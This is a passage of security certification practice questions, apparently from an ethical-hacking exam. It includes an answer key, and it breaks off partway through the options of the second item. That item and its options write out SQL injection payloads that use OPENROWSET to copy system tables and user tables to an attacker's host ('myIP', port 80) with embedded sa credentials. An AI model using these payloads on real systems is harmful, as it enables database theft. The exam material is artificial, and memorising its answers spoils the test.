
Which of the following flaws refers to an application using poorly written encryption code to
securely encrypt and store sensitive data in the database and allows an attacker to steal or
modify weakly protected data such as credit card numbers, SSNs, and other authentication
credentials?
A. SSI injection attack
B. Insecure cryptographic storage attack
C. Hidden field manipulation attack
D. Man-in-the-Middle attack
Answer(s): B
QUESTION: 11
A penetration tester tries to transfer the database from the target machine to a different
machine. For this, he uses OPENROWSET to link the target database to his own database,
replicates the database structure, and transfers the data to his machine via a connection to
the remote machine on port 80.
The query he used to transfer databases was:
'; insert into OPENROWSET
('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 80;', 'select * from
mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases -
The query he used to transfer table 1 was:
'; insert into OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 80;', 'select * from
mydatabase..table1') select * from database..table1 -
What query does he need in order to transfer the column?
A. '; insert into
OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 80;',
'select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables -
B. '; insert into
OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 80;',
'select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows -
C. '; insert into